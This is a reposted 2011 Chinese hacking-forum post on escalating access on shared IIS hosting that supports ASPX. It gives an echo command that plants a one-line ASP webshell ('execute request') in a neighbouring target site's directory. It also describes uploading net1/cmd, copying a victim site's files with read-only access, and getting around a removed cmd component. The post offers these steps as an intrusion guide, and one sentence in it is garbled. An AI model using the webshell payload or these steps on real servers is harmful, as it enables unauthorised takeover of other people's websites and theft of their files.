[转贴] 关于支持aspx的网站提权总结

主题	好友	682 积分

高级会员

发消息

发表于 2011-3-29 19:51:02 |显示全部楼层

aspx的权限肯定是要比asp的大一些，asp的权限比guest 要小，而aspx 有点类似user的权限。

所以很明显了，

这里我给家举例吧：给大家举2个例子

第一个是我们在旁注的时候，无法跳到B网站，但是服务器支持aspx。

这时我们要看矗懿荒苤葱衏md 我们自己上传 net1 跟cmd 如果能执行的话，那么目标站拿下的几率大概为70 80左右。

我们可以往目标站上写一句话，或者我们没有写的权限，但是我们有读的权限，我们完全可以复制一个目标站的文件到我们旁站的目录里。

我知道有很多人会看不懂。我举例吧：

aspx 脚本上执行：echo ^<^%execute request("foolishqiang")^%^> >目标站的路径\傻强.asp

这样在目标站的跟目录就有我们一个：傻强.asp 的一句话木马了

如果你还不明白的话，你只需要在你旁站的shell里执行这句话，然后一句话链接目标站地址+傻强.asp

看看，是不是 hello 了。哈哈成功了。

如果我们没有写的权限，我想我们肯定会有读的权限了。

构造语句：

copy 目标网站/index.htm 旁注网站

哈哈显示已复制一个文件，这个有点像什么？

像不像新云的老漏洞？那我们就可以随便的下载目标站的文件了。

看你怎么利用了

我在给大家说一下吧，如果目标站的cmd组件被删除了的话，大多数网站只要能支持aspx ，那么我们就可以完全绕过cmd 组件（大多数站点），我们构造本地cmd命令，远程执行，看看是不是这个有助于上面的文章呢？

我这里只是个抛砖引玉的作用，大牛们不要见笑。

使用道具举报

返回列表

		自动登录	找回密码
密码			注册会员

[转贴] 关于支持aspx的网站提权总结

快速发帖